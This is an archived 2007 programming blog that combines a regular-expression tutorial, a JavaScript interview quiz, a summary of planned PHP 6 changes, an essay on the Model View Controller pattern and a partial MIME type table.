Tuesday, October 2, 2007

Regular Expression Tutorial: Learn How to Use and Get the Most out of Regular Expressions

In this tutorial, I will teach you all you need to know to be able to craft powerful time-saving regular expressions. I will start with the most basic concepts, so that you can follow this tutorial even if you know nothing at all about regular expressions yet.

But I will not stop there. I will also explain how a regular expression engine works on the inside, and alert you to the consequences. This will help you quickly understand why a particular regex does not do what you initially expected, and it will save you lots of guesswork and head-scratching when you need to write more complex regexes.

What Regular Expressions Are Exactly - Terminology

Basically, a regular expression is a pattern describing a certain amount of text. The name comes from the mathematical theory on which regular expressions are based, but we will not dig into that. Since most people, myself included, are too lazy to type the full name, you will usually find it abbreviated to regex or regexp. I prefer regex, because its plural, "regexes", is easy to pronounce.

On this website, regular expressions are printed as regex. If your browser has proper support for cascading style sheets, the regex should be highlighted in red.

This first example is actually a perfectly valid regex. It is the most basic pattern, simply matching the literal text regex. A "match" is the piece of text, or sequence of bytes or characters, that the regex processing software found to correspond to the pattern. Matches are highlighted in blue on this site.

\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b is a more complex pattern. It describes a series of letters, digits, dots, underscores, percent signs, plus signs and hyphens, followed by an at sign, followed by another series of letters, digits, dots and hyphens, finally followed by a single dot and between two and four letters. (Because only uppercase A-Z is listed, the pattern matches lowercase addresses only when case-insensitive matching is turned on.) In other words: this pattern describes an email address.

With the above regular expression pattern, you can search through a text file to find email addresses, or verify whether a given string looks like an email address. In this tutorial, I will use the term "string" to indicate the text that I am applying the regular expression to. I will highlight strings in green.

The term "string" or "character string" is used by programmers to indicate a sequence of characters. In practice, you can use regular expressions with whatever data you can access using the application or programming language you are working with.
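To make the difference between searching and verifying concrete, here is a minimal JavaScript sketch using the email pattern above (JavaScript's regex syntax is close enough to Perl's for this pattern). It assumes case-insensitive matching via the `i` flag, since the pattern lists only uppercase letters; the function names `findEmails` and `looksLikeEmail` are made up for illustration. For verification, the `\b` word boundaries are swapped for `^` and `$` anchors so that the whole string must match.

```javascript
// The tutorial's pattern. "g" finds every match; "i" lets A-Z also match a-z.
const EMAIL_SEARCH = /\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b/gi;

// Anchored variant: the entire string must look like an email address.
// No "g" flag here, so test() does not carry state between calls.
const EMAIL_WHOLE = /^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$/i;

// Return every substring of `text` that looks like an email address.
function findEmails(text) {
  return text.match(EMAIL_SEARCH) || [];
}

// True only if the whole string looks like an email address.
function looksLikeEmail(s) {
  return EMAIL_WHOLE.test(s);
}

const sample = "Write to john.doe@example.com or sales@example.co.uk today.";
console.log(findEmails(sample));                  // both addresses
console.log(looksLikeEmail("john.doe@example.com")); // true
console.log(looksLikeEmail("not an email"));         // false
```

Note that `[A-Z]{2,4}` rejects top-level domains longer than four letters, such as `.museum`.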

Different Regular Expression Engines

A regular expression "engine" is a piece of software that can process regular expressions, trying to match the pattern to the given string. Usually, the engine is part of a larger application and you do not access the engine directly. Rather, the application will invoke it for you when needed, making sure the right regular expression is applied to the right file or data.

As usual in the software world, different regular expression engines are not fully compatible with each other. It is not possible to describe every kind of engine and regular expression syntax (or "flavor") in this tutorial. I will focus on the regex flavor used by Perl 5, for the simple reason that this regex flavor is the most popular one, and deservedly so. Many more recent regex engines are very similar, but not identical, to that of Perl 5. Examples are the open source PCRE engine (used in many tools and languages like PHP), the .NET regular expression library, and the regular expression package included with version 1.4 and later of the Java JDK. I will point out whenever differences between regex flavors are important, and which features are specific to the Perl derivatives mentioned above.

Give Regexes a First Try

You can easily try the following yourself in a text editor that supports regular expressions, such as EditPad Pro. If you do not have such an editor, you can download the free evaluation version of EditPad Pro to try this out. EditPad Pro's regex engine is fully functional in the demo version. As a quick test, copy and paste the text of this page into EditPad Pro. Then select Search|Show Search Panel from the menu. In the search pane that appears near the bottom, type in regex in the box labeled "Search Text". Mark the "Regular expression" checkbox, and click the Find First button. This is the leftmost button on the search panel. See how EditPad Pro's regex engine finds the first match. Click the Find Next button, which sits next to the Find First button, to find further matches. When there are no further matches, the Find Next button's icon will flash briefly.

Now try to search using the regex reg(ular expressions?|ex(p|es)?). This regex will find all the names, singular and plural, that I have used on this page to say "regex". With plain text search alone, we would have needed five searches; with regexes, we need just one. Regexes save you time when using a tool like EditPad Pro. Select Count Matches in the Search menu to see how many times this regular expression matches the file you have open in EditPad Pro.
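The same one-pass search can be run from code. A minimal JavaScript sketch, assuming the `g` flag so that `String.prototype.match` returns every match rather than just the first; the sample sentence is made up and contains each of the five names once:

```javascript
// The alternation pattern from the text: "reg" followed by either
// "ular expression(s)" or "ex" with an optional "p" or "es".
const REGEX_NAMES = /reg(ular expressions?|ex(p|es)?)/g;

// Count how many times the pattern matches in `text`.
function countMatches(text) {
  const matches = text.match(REGEX_NAMES);
  return matches ? matches.length : 0;
}

const text = "A regular expression, or regex, or regexp. Plural: regexes, regular expressions.";
console.log(text.match(REGEX_NAMES)); // the five names, in order of appearance
console.log(countMatches(text));      // 5
```

The pattern is case-sensitive as written, so a capitalized "Regex" at the start of a sentence is only counted if you add the `i` flag.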

If you are a programmer, your software can run faster too: even a simple regex engine applying the above regex once will typically outperform a state-of-the-art plain text search algorithm searching through the data five times. Regular expressions also reduce development time. With a regex engine, it takes only one line (e.g. in Perl, PHP, Java or .NET) or a couple of lines (e.g. in C using PCRE) of code to, say, check whether the user's input looks like a valid email address.

Friday, September 28, 2007

PHP, JavaScript & AJAX interview questions

1. Why do JavaScript and Java have similar names?

A. JavaScript is a stripped-down version of Java


B. JavaScript's syntax is loosely based on Java's


C. They both originated on the island of Java


D. None of the above


2. When a user views a page containing a JavaScript program, which machine actually executes the script?


A. The User's machine running a Web browser


B. The Web server


C. A central machine deep within Netscape's corporate offices


D. None of the above


3. ______ JavaScript is also called client-side JavaScript.


A. Microsoft


B. Navigator


C. LiveWire


D. Native


4. __________ JavaScript is also called server-side JavaScript.



A. Microsoft


B. Navigator


C. LiveWire


D. Native


5. What are variables used for in JavaScript programs?


A. Storing numbers, dates, or other values


B. Varying randomly


C. Causing high-school algebra flashbacks


D. None of the above


6. _____ JavaScript statements embedded in an HTML page can respond to user events such as mouse-clicks, form input, and page navigation.


A. Client-side


B. Server-side


C. Local


D. Native


7. What should appear at the very end of your JavaScript, if it begins with the <script LANGUAGE="JavaScript"> tag?


A. The </script>


B. The <script>


C. The END statement


D. None of the above


8. Which of the following can't be done with client-side JavaScript?


A. Validating a form


B. Sending a form's contents by email


C. Storing the form's contents to a database file on the server


D. None of the above


9. Which of the following are capabilities of functions in JavaScript?


A. Return a value


B. Accept parameters and Return a value


C. Accept parameters


D. None of the above


10. Which of the following is not a valid JavaScript variable name?


A. 2names


B. _first_and_last_names


C. FirstAndLast


D. None of the above


11. The ______ tag is an extension to HTML that can enclose any number of JavaScript statements.


A. <SCRIPT>


B. <BODY>


C. <HEAD>


D. <TITLE>


12. How does JavaScript store dates in a date object?


A. The number of milliseconds since January 1st, 1970


B. The number of days since January 1st, 1900


C. The number of seconds since Netscape's public stock offering.


D. None of the above


13. Which of the following attributes can hold the JavaScript version?


A. LANGUAGE


B. SCRIPT


C. VERSION


D. None of the above


14. What is the correct JavaScript syntax to write "Hello World"?


A. System.out.println("Hello World")


B. println ("Hello World")


C. document.write("Hello World")


D. response.write("Hello World")


15. Which of the following can be used to indicate the LANGUAGE attribute?


A. <LANGUAGE="JavaScriptVersion">


B. <SCRIPT LANGUAGE="JavaScriptVersion">


C. <SCRIPT LANGUAGE="JavaScriptVersion"> JavaScript statements…</SCRIPT>


D. <SCRIPT LANGUAGE="JavaScriptVersion"!> JavaScript statements…</SCRIPT>


16. Inside which HTML element do we put the JavaScript?


A. <js>


B. <scripting>


C. <script>


D. <javascript>


17. What is the correct syntax for referring to an external script called "abc.js"?


A. <script href="abc.js">


B. <script name="abc.js">


C. <script src="abc.js">


D. None of the above


18. Which types of image maps can be used with JavaScript?


A. Server-side image maps


B. Client-side image maps


C. Server-side image maps and Client-side image maps


D. None of the above


19. Which of the following navigator object properties is the same in both Netscape and IE?


A. navigator.appCodeName


B. navigator.appName


C. navigator.appVersion


D. None of the above


20. Which is the correct way to write a JavaScript array?


A. var txt = new Array(1:"tim",2:"kim",3:"jim")


B. var txt = new Array:1=("tim")2=("kim")3=("jim")


C. var txt = new Array("tim","kim","jim")


D. var txt = new Array="tim","kim","jim"


21. What does the <noscript> tag do?


A. Encloses text to be displayed by non-JavaScript browsers.


B. Prevents scripts on the page from executing.


C. Describes certain low-budget movies.


D. None of the above


22. If para1 is the DOM object for a paragraph, what is the correct syntax to change the text within the paragraph?


A. "New Text"?


B. para1.value="New Text";


C. para1.firstChild.nodeValue= "New Text";


D. para1.nodeValue="New Text";


23. JavaScript entities start with _______ and end with _________.


A. Semicolon, colon


B. Semicolon, Ampersand


C. Ampersand, colon


D. Ampersand, semicolon


24. Which of the following best describes JavaScript?


A. a low-level programming language.


B. a scripting language precompiled in the browser.


C. a compiled scripting language.


D. an object-oriented scripting language.


25. Choose the server-side JavaScript object.


A. FileUpLoad


B. Function


C. File


D. Date


26. Choose the client-side JavaScript object.


A. Database


B. Cursor



C. Client


D. FileUpLoad


27. Which of the following is not considered a JavaScript operator?


A. new


B. this


C. delete


D. typeof


28. The ______ method evaluates a string of JavaScript code in the context of the specified object.


A. Eval


B. ParseInt


C. ParseFloat


D. Efloat


29. Which of the following events fires when one of these form elements loses focus: <button>, <input>, <label>, <select>, <textarea>?


A. onfocus


B. onblur


C. onclick


D. ondblclick


30. The syntax of Eval is ________________


A. [objectName.]eval(numeric)


B. [objectName.]eval(string)


C. [EvalName.]eval(string)


D. [EvalName.]eval(numeric)


31. JavaScript is interpreted by _________


A. Client


B. Server


C. Object


D. None of the above


32. Using the _______ statement is how you test for a specific condition.


A. Select


B. If


C. Switch


D. For


33. Which of the following is the structure of an if statement?


A. if (conditional expression is true) then execute this code end if


B. if (conditional expression is true) execute this code end if


C. if (conditional expression is true) {then execute this code>->}


D. if (conditional expression is true) then {execute this code}


34. How do you create a Date object in JavaScript?


A. dateObjectName = new Date([parameters])


B. dateObjectName.new Date([parameters])


C. dateObjectName := new Date([parameters])


D. dateObjectName Date([parameters])


35. The _______ method of an Array object adds and/or removes elements from an array.


A. Reverse


B. Shift


C. Slice


D. Splice


36. To set up the window to capture all Click events, which of the following statements do we use?


A. window.captureEvents(Event.CLICK);


B. window.handleEvents (Event.CLICK);


C. window.routeEvents(Event.CLICK );


D. window.raiseEvents(Event.CLICK );


37. Which tag(s) can handle mouse events in Netscape?


A. <IMG>


B. <A>


C. <BR>


D. None of the above


38. ____________ is the tainted property of a window object.


A. Pathname


B. Protocol


C. Defaultstatus


D. Host


39. To enable data tainting, the end user sets the _________ environment variable.


A. ENABLE_TAINT


B. MS_ENABLE_TAINT


C. NS_ENABLE_TAINT


D. ENABLE_TAINT_NS


40. In JavaScript, _________ is an object of the target language data type that encloses an object of the source language.

A. a wrapper


B. a link


C. a cursor


D. a form


41. When a JavaScript object is sent to Java, the runtime engine creates a Java wrapper of type ___________

A. ScriptObject


B. JSObject


C. JavaObject


D. Jobject


42. The _______ class provides an interface for invoking JavaScript methods and examining JavaScript properties.


A. ScriptObject


B. JSObject


C. JavaObject


D. Jobject


43. _________ is a wrapped Java array, accessed from within JavaScript code.


A. JavaArray


B. JavaClass


C. JavaObject


D. JavaPackage


44. A ________ object is a reference to one of the classes in a Java package, such as netscape.javascript.


A. JavaArray


B. JavaClass


C. JavaObject


D. JavaPackage


45. The JavaScript exception is available to the Java code as an instance of __________


A. netscape.javascript.JSObject


B. netscape.javascript.JSException


C. netscape.plugin.JSException


D. None of the above


46. To automatically open the console when a JavaScript error occurs, which of the following is added to prefs.js?


A. user_pref(" javascript.console.open_on_error", false);


B. user_pref("javascript.console.open_error ", true);


C. user_pref("javascript.console.open_error ", false);


D. user_pref("javascript.console.open_on_error", true);


47. To open a dialog box each time an error occurs, which of the following is added to prefs.js?


A. user_pref("javascript.classic.error_alerts", true);


B. user_pref("javascript.classic.error_alerts ", false);


C. user_pref("javascript.console.open_on_error ", true);


D. user_pref("javascript.console.open_on_error ", false);


48. The syntax of the blur method of a button object is ______________


A. Blur()


B. Blur(contrast)


C. Blur(value)


D. Blur(depth)


49. The syntax of the captureEvents method of the document object is ______________


A. captureEvents()


B. captureEvents(args eventType)


C. captureEvents(eventType)


D. captureEvents(eventVal)


50. The syntax of the close method of the document object is ______________


A. Close(doc)


B. Close(object)


C. Close(val)


D. Close()
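Several of the questions above can be checked directly in a JavaScript console. The sketch below (plain JavaScript, runnable in Node.js or a browser console) exercises the questions on Date storage, array syntax, splice and variable names. The helper `isValidVarName` is a hypothetical illustration that only tests whether `var NAME;` parses, so it is a rough check rather than a full identifier validator.

```javascript
// Date storage: a Date wraps a count of milliseconds since
// 1 January 1970, 00:00:00 UTC.
const epoch = new Date(0);
console.log(epoch.getTime());                  // 0
console.log(new Date(86400000).toISOString()); // 1970-01-02T00:00:00.000Z (one day later)

// Array syntax: the Array constructor takes the elements as a plain
// comma-separated argument list.
const txt = new Array("tim", "kim", "jim");
console.log(txt.length, txt[2]); // 3 jim

// splice(start, deleteCount, ...items) removes and/or inserts elements in
// place and returns the removed ones. Here "kim" is removed and "ann" and
// "bob" are inserted at index 1, leaving tim, ann, bob, jim.
const names = ["tim", "kim", "jim"];
const removed = names.splice(1, 1, "ann", "bob");
console.log(removed, names);

// Variable names: an identifier may not start with a digit. This
// hypothetical helper asks the parser whether "var NAME;" is valid.
function isValidVarName(name) {
  try {
    new Function("var " + name + ";");
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e; // anything other than a parse error is unexpected
  }
}

console.log(isValidVarName("2names"));                // false
console.log(isValidVarName("_first_and_last_names")); // true
console.log(isValidVarName("FirstAndLast"));          // true
```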

Wednesday, August 29, 2007

Introducing PHP 6

As you may be aware, the core PHP developers met in Paris on November 11th and 12th, 2005. The minutes from the meeting are fascinating reading, but there is a lot to go through, so I've gone through all of the points raised and chewed them over from a developer's point of view. Your comments, as always, are welcome.

Before I get started, however, I'd like to make one thing very clear: what you read here (or in the original minutes) is in no way the 'fully 100% decided' set of changes that we'll see in PHP6. They will most likely all be discussed further (on internals and more widely), but even so we can take the information presented in the minutes as the PHP team's most 'current' way of thinking about any given subject.

Unicode

Unicode support can currently be switched on or off per request. This means PHP has to store both Unicode and non-Unicode variants of class, method and function names in the symbol tables; in short, it uses more resources. The team's decision is to make the Unicode setting server-wide rather than per request. Turning Unicode off where it is not required can help performance: they quote some string functions as being up to 300% slower, and whole applications 25% slower, with Unicode enabled. Moving the setting into php.ini, in my mind, takes control away from the user and puts it into the hands of the web host.

If you compile PHP yourself or are responsible for this on your servers, you may be interested to know that PHP 6 will require the ICU libs (regardless of whether Unicode is turned on or off). The build system will bail out if the required ICU libs cannot be found. In a nutshell, you'll have another thing to install if you want to compile PHP.

Register Globals to go

Say goodbye, folks: this one is finally going. It will no longer be an ini file setting, and if found it will raise an E_CORE_ERROR, pointing you to the documentation on why it's "bad". This means that PHP6 will finally break all PHP3-era scripts (or any script using register globals), with no recourse at all but to re-code them. That's a bold move, but a needed one.

Magic Quotes to go

The magic quotes feature of PHP will be going, and as with register globals it's going to raise an E_CORE_ERROR if the setting is found anywhere. This will affect magic_quotes, magic_quotes_sybase and magic_quotes_gpc.

Safe Mode to go

This may please developers whose web hosts insist upon safe mode! It will go totally, again raising an E_CORE_ERROR if found. The reason is that they apparently felt it gave the 'wrong signal', implying that it made PHP secure, when in fact it didn't at all. open_basedir will (thankfully) be kept.

'var' to alias 'public'

PHP4 used 'var' within classes. PHP5 (in its OO move) caused this to raise a warning under E_STRICT. This warning will be removed in PHP6, and instead 'var' will mean the same thing as 'public'. This is a nice move, but for anyone who has already updated their scripts to work under E_STRICT in PHP5 it will be redundant.

Return by Reference will error

Both '$foo =& new StdClass()' and 'function &foo' will now raise an E_STRICT error.

zend.ze1 compatibility mode to go

ze1 always tried to retain old PHP4 behaviour, but apparently it "doesn't work 100%" anyway, so it will be removed totally and throw an E_CORE_ERROR if detected.

Freetype 1 and GD 1 support to go

Support for both of these (very very old) libs will be removed.

dl() moves to SAPI only

Each SAPI will register the use of this function as required; from now on only the CLI and embed SAPIs will do this. It will not be available elsewhere.

FastCGI always on

The FastCGI code will be cleaned up and always enabled for the CGI SAPI; it will not be possible to disable it.

Register Long Arrays to go

Remember the HTTP_*_VARS globals from yesteryear? Well if you're not already using $_GET, $_POST, etc - start doing so now, because the option to enable long arrays is going (and will throw an E_CORE_ERROR).

Extension Movements

The XMLReader and XMLWriter extensions will move into the core distribution and will be on by default.

The ereg extension will move to PECL (and thus be removed from PHP). This means that PCRE can no longer be disabled. This will make way for the new regular expression extension based on ICU.

The extremely useful Fileinfo extension will move into the core distribution and be enabled by default.

PHP Engine Additions

64-bit integers
A new 64-bit integer type will be added (int64). There will be no int32 (it is assumed unless you specify int64).

Goto
No 'goto' command will be added, but the break keyword will be extended with a static label - so you could do 'break foo' and it'll jump to the label foo: in your code.

ifsetor()
It looks like we won't be seeing this one, which is a shame. Instead, the ?: operator will have the 'middle parameter' requirement dropped, which means you'd be able to write something like "$foo = $_GET['foo'] ?: 42;" (i.e. $foo will equal $_GET['foo'] if that value evaluates to true, and 42 otherwise). This should save some code, but I personally don't think it is as 'readable' as ifsetor would have been.

foreach multi-dim arrays
This is a nice change - you'll be able to foreach through nested arrays and unpack each element with list(), i.e. "foreach ($arr as $k => list($a, $b))".

{} vs []
You can currently use both {} and [] to access string indexes. But the {} notation will raise an E_STRICT in PHP5.1 and will be gone totally in PHP6. Also the [] version will gain substr and array_slice functionality directly - so you could do "[2,]" to access characters 2 to the end, etc. Very handy.

OO changes

Static Binding
A new keyword will be created to allow for late static binding: static::static2() will perform runtime evaluation of statics.

Namespaces
It looks like this one is still undecided - if they do implement namespaces it will be using their style only. My advice? Don't hold your breath!

Type-hinted Return Values
Although they decided against allowing type-hinted properties (because it's "not the PHP way"), they will add support for type-hinted return values, but have yet to decide on a syntax for this. Even so, it will be a nice addition.

Calling dynamic functions as static will E_FATAL
At the moment you can call any method either statically or dynamically, whether or not it is declared static. In PHP6, calling a dynamic (non-static) method with the static call syntax will raise an E_FATAL.

Additions to PHP

APC to be in the core distribution
The opcode cache APC will be included in the core distribution of PHP as standard. It will not, however, be turned on by default, but having it there saves compiling yet another thing on your server, and web hosts are more likely to allow it to be enabled.

Hardened PHP patch
This patch implements a bunch of extra security checks in PHP. They went over it and the following changes will now take place within PHP: Protection against HTTP Response Splitting will be included. allow_url_fopen will be split into two: allow_url_fopen and allow_url_include. allow_url_fopen will be enabled by default. allow_url_include will be disabled by default.

E_STRICT merges into E_ALL
Wow, this is quite a serious one! E_STRICT level messages will be added to E_ALL by default. This shows a marked move by the PHP team to educate developers on 'best practices', displaying language-level warnings in a "Hey, you're doing it the wrong way" manner.

Farewell
They will remove support for the ASP-style tags, but the PHP short-code tag (<?) will remain.

Conclusion

In my mind, PHP6 is making an interesting move. It's as if the PHP developers now want to educate developers about the right way to code something, and remove those lingering issues of "Well, you SHOULD be doing it this way, but you can still do it the old way". This will no longer be the case. Totally removing the likes of register globals, magic quotes, long arrays, {} string indexes and call-time-pass-by-references will force developers to clean up their code.

It will also break a crapload of scripts beyond any repair that doesn't involve some serious rewriting. Is this a bad thing? I don't think so myself, but I can see it making the adoption of PHP6 even slower than that of PHP5, which is a real shame. However, they have to leap this hurdle at some point, and once they've done it, progression to future versions should be swifter.

Model View Controller

The Model View Controller pattern is popular for organizing Web applications. Yet, there is quite a bit of confusion surrounding MVC. What exactly is it? Whatever it is, it must be good. Like object orientation, MVC seems to have earned a halo. It has a reputation for being a good design practice. Therefore, in a strange twist of logic, anyone who creates a good design must be using MVC, right? Much like good practices that have nothing to do with objects are lumped under that general term, good practices that have little to do with MVC are lumped under that term. A precise definition of MVC is probably impossible.

That said, we do have an historical record to fall back on. MVC was introduced as a graphical user interface organizational principle in Smalltalk in the mid-70s. A later paper, “Applications Programming in Smalltalk-80: How to use Model-View-Controller MVC,” describes the Smalltalk implementation. From this and other papers dating from the early Smalltalk years, we can gain insight into the original intent of the MVC pattern.

The original intent of the MVC pattern was to structure an application with a user interface in order to make certain kinds of changes easier. As I discussed in my first column, “Organizing for Change”, it can be a good idea to segregate different kinds of code in an application based on the changes that one is likely to make. For programs with user interfaces, it is generally considered a good idea to separate the user-interface-related code from the domain-related code, because those kinds of code tend to change for different reasons and at different times. Separating the two allows the programmer to make a change in one without having to touch the other.

Separating the user interface from the domain logic also allows one implementation to be swapped with another. Different views and controllers can be substituted to provide alternate user interfaces for the same model. For example, the same model data can be displayed as a bar graph, a pie chart, or a spreadsheet.

But wait! The Model View Controller pattern has three segments. To separate the user interface from the domain logic, it would seem that only two would be needed. Why three? This goes back to the original metaphor upon which MVC is based. Conceptually, MVC is intended to replicate an abstract data processing model. In that model, data is fed into a computer as input. A processor uses that data to perform some task. Then some kind of output is produced. Notice that there are three stages in that process. These three stages correspond to the model, view, and controller segmentation of the MVC pattern.

Perhaps the most obvious correspondence is the view: it is the output portion of the program. Working back from the end of the process, the model segment of the program corresponds to the processing component. Unfortunately, when many people think of the word ’model’, they think of data, nouns and structure. In MVC, ’model’ corresponds to ’processor’. You should also think in terms of verbs when you think of the model. The model is where the work the program is designed to do gets done.

The remaining segment, and the one that seems most confusing, is the controller. The controller corresponds to the input phase of our data processing abstraction. It receives input and translates that input to requests on the model or the view. Why is the controller so confusing? Well, if your model is verb-shy, you have to put the behavioral aspect of your domain logic somewhere. Often people will separate out the view or output logic, separate out the data storage logic, and then consider that anything else left must be the controller, right? Well, no.
You see, while MVC is a way of separating the user interface from the domain logic, not every way of achieving this separation is MVC. Not every method of structuring a user interface is MVC. In Smalltalk MVC, the idea of having a separate controller layer for input allows an input method to be changed without changing either the view or the model. For example, in a spreadsheet program, a different controller would handle mouse input or keyboard input, but the model and view objects would be the same. Fair enough, but how many times in a Web application do you want to swap out input methods without also changing the corresponding output? There is a strong coupling between the input and output methods of a program. It can be hard to change one without changing the other. Another common UI organization pattern is called Document/View. Document/View collapses the input and output layers of MVC into a single view layer. Document/View is a good way of separating your user interface from domain logic, but it is not MVC. We pay a price for dividing our applications into three parts.

The Model

The model encapsulates the functional core of an application, its domain logic. The goal of MVC is to make the model independent of the view and controller, which together form the user interface of the application. A model could conceivably be used with multiple different view-controller interface pairings. Since the model must be independent, it cannot refer to either the view or controller portions of the application. The model may not hold direct instance variables that refer to the view or the controller. It passively supplies its services and data to the other layers of the application. In fact, there is a variation on the model layer typically used with Web applications, called a passive model. With a passive model, the objects used in the model are completely unaware of being used in the MVC triad. The controller notifies the view when it executes an operation on the model that will require the view to be updated. In another version more traditional to MVC, the active model, model classes define a change notification mechanism, typically using the Observer pattern. This allows unrelated view and controller components to be notified when the model has changed. Since these components register themselves with the model, and the model has no knowledge of any specific view or controller, this does not break the independence of the model. This notification mechanism is behind the immediate updating that is the hallmark of an MVC GUI application. The passive model is commonly used in Web MVC. The strict request/response cycle of HTTP does not require the immediacy of an active model. The view is always rendered anew on every cycle, regardless of changes. This may be especially true in PHP, where no state is retained between requests.
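The active-model notification mechanism can be sketched in a few lines of JavaScript. This is a minimal Observer-pattern illustration under the assumptions above, not code from any particular framework; the classes `AccountModel` and `BalanceView` are hypothetical. The model keeps a list of callbacks and knows nothing about who registered them.

```javascript
// Hypothetical "active model": it notifies registered listeners
// whenever its state changes.
class AccountModel {
  constructor(balance = 0) {
    this.balance = balance;
    // Callbacks registered by views or controllers. The model never
    // refers to any specific view or controller class.
    this.listeners = [];
  }

  subscribe(listener) {
    this.listeners.push(listener);
  }

  deposit(amount) {
    this.balance += amount;
    this.notify();
  }

  notify() {
    for (const listener of this.listeners) {
      listener(this);
    }
  }
}

// A view registers itself with the model and re-renders on every change.
class BalanceView {
  constructor(model) {
    this.output = "";
    model.subscribe((m) => this.render(m));
    this.render(model);
  }

  render(model) {
    this.output = `Balance: ${model.balance}`;
    console.log(this.output);
  }
}

const account = new AccountModel(100);
const view = new BalanceView(account); // prints "Balance: 100"
account.deposit(50);                   // prints "Balance: 150" via the notification
```

Because the view subscribes itself, the model stays independent: any number of views can register without the model's code changing.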

The View

The view obtains data from the model and presents it to the user. It represents the output of the application. The view can be implemented using a variety of techniques, including templates, or a transformative method like XSL. One major misconception I see in beginner questions about MVC is that the view must somehow remain separate from the model. This line of thinking causes frustration with MVC. Programmers end up creating controllers that shuffle data from the model into the view. This is unnecessary. The view usually has a direct dependency on the model. If you change the model, you must also change the view. Because the view depends on the model, the view can generally have free access to the model. Well, almost free access. Views are read-only representations of the state of the model. They should not attempt to modify the model; this would be a violation of the MVC separation. Attempting to modify the model in the view would indicate a mixing of controller code into the view layer. A far more common and insidious violation of separation occurs when domain model code leaks into the view. For example, consider the requirement “Show negative balances in red.” At first glance, this appears to be strictly an output requirement, and a test might be placed into the view in roughly this form: if balance < 0 then show it in red.

Can you spot the violation of separation? Upon further analysis, it turns out that the real requirement is “show overdrawn balances in red.” The definition of overdrawn, here balance < 0, belongs in the domain model, not in the view. In this way, changes to the definition of ’overdrawn’ can be made independently of decisions about how to display the status of being overdrawn.
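The "overdrawn" example might look like this in JavaScript, assuming a hypothetical `Account` class and a `renderBalance` view function that emits an HTML snippet. The domain rule (`isOverdrawn`) lives in the model; the view only chooses a color.

```javascript
// Hypothetical domain object: the meaning of "overdrawn" is a domain rule,
// so it is defined here rather than in the view.
class Account {
  constructor(balance) {
    this.balance = balance;
  }

  isOverdrawn() {
    return this.balance < 0;
  }
}

// The view only decides how to display the status, not what it means.
function renderBalance(account) {
  const color = account.isOverdrawn() ? "red" : "black";
  return `<span style="color: ${color}">${account.balance}</span>`;
}

console.log(renderBalance(new Account(-25))); // <span style="color: red">-25</span>
console.log(renderBalance(new Account(40)));  // <span style="color: black">40</span>
```

If the definition of overdrawn later changed (say, to allow an agreed overdraft limit), only `isOverdrawn` would need editing; `renderBalance` would stay the same.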

The Controller

The controller receives and translates input to requests on the model or view. Controllers are typically responsible for calling methods on the model that change the state of the model. In an active model, this state change is then reflected in the view via the change propagation mechanism. A passive model shifts more responsibility into the controller, as the controller must notify the views when they should update. In traditional Smalltalk MVC, views and controllers are tightly coupled. Each view instance is associated with a single unique controller instance, and vice versa. The controller is considered a strategy that the view uses for input. The view is also responsible for creating new views and controllers. Modern Web usage of MVC shifts even more of the traditional responsibilities of the view to the controller. The controller becomes responsible for creating and selecting views, and the view tends to lose responsibility for its controller. Sometimes, responsibility for creating and selecting views is delegated to a specific object; this is known as the Application Controller pattern for Web MVC, or the View Handler pattern for GUI MVC. You can see that, as with the view, the controller also has a direct dependency on the model. Changes to the model layer will often trigger corresponding changes in the controller layer. Of course, the reverse should not be true. Unfortunately, as with the view, it is easy for domain logic to leak out of the domain layer and into the controller. This is especially true when the domain model is considered to be passive, verb-deprived data. This is a big challenge for modern MVC frameworks for the Web. The controller can be an inviting place for quick and dirty unstructured code.
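With a passive model, the controller carries the extra duty of refreshing the view. A minimal JavaScript sketch, with hypothetical `Counter`, `CounterView` and `CounterController` classes: the model is a plain object with no notification mechanism, so the controller renders the view after every operation, much as a Web controller renders a fresh page on each request.

```javascript
// Passive model: a plain object, completely unaware of MVC.
class Counter {
  constructor() {
    this.value = 0;
  }

  increment() {
    this.value += 1;
  }
}

// View: read-only access to the model, produces output.
class CounterView {
  render(counter) {
    return `Count: ${counter.value}`;
  }
}

// Controller: translates input into a request on the model, then,
// because the model is passive, asks the view to render.
class CounterController {
  constructor(model, view) {
    this.model = model;
    this.view = view;
  }

  handle(input) {
    if (input === "increment") {
      this.model.increment();
    }
    // Unknown input changes nothing but still re-renders the view.
    return this.view.render(this.model);
  }
}

const controller = new CounterController(new Counter(), new CounterView());
controller.handle("increment");
console.log(controller.handle("increment")); // Count: 2
```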

Thursday, August 16, 2007

Mime Types

MIME Types By Content Type

Type/sub-type Extension
application/envoy evy
application/fractals fif
application/futuresplash spl
application/hta hta
application/internet-property-stream acx
application/mac-binhex40 hqx
application/msword doc
application/msword dot
application/octet-stream *
application/octet-stream bin
application/octet-stream class
application/octet-stream dms
application/octet-stream exe
application/octet-stream lha
application/octet-stream lzh
application/oda oda
application/olescript axs
application/pdf pdf
application/pics-rules prf
application/pkcs10 p10
application/pkix-crl crl
application/postscript ai
application/postscript eps
application/postscript ps
application/rtf rtf
application/set-payment-initiation setpay
application/set-registration-initiation setreg
application/vnd.ms-excel xla
application/vnd.ms-excel xlc
application/vnd.ms-excel xlm
application/vnd.ms-excel xls
application/vnd.ms-excel xlt
application/vnd.ms-excel xlw
application/vnd.ms-outlook msg
application/vnd.ms-pkicertstore sst
application/vnd.ms-pkiseccat cat
application/vnd.ms-pkistl stl
application/vnd.ms-powerpoint pot
application/vnd.ms-powerpoint pps
application/vnd.ms-powerpoint ppt
application/vnd.ms-project mpp
application/vnd.ms-works wcm
application/vnd.ms-works wdb
application/vnd.ms-works wks
application/vnd.ms-works wps
application/winhlp hlp
application/x-bcpio bcpio
application/x-cdf cdf
application/x-compress z
application/x-compressed tgz
application/x-cpio cpio
application/x-csh csh
application/x-director dcr
application/x-director dir
application/x-director dxr
application/x-dvi dvi
application/x-gtar gtar
application/x-gzip gz
application/x-hdf hdf
application/x-internet-signup ins
application/x-internet-signup isp
application/x-iphone iii
application/x-javascript js
application/x-latex latex
application/x-msaccess mdb
application/x-mscardfile crd
application/x-msclip clp
application/x-msdownload dll
application/x-msmediaview m13
application/x-msmediaview m14
application/x-msmediaview mvb
application/x-msmetafile wmf
application/x-msmoney mny
application/x-mspublisher pub
application/x-msschedule scd
application/x-msterminal trm
application/x-mswrite wri
application/x-netcdf cdf
application/x-netcdf nc
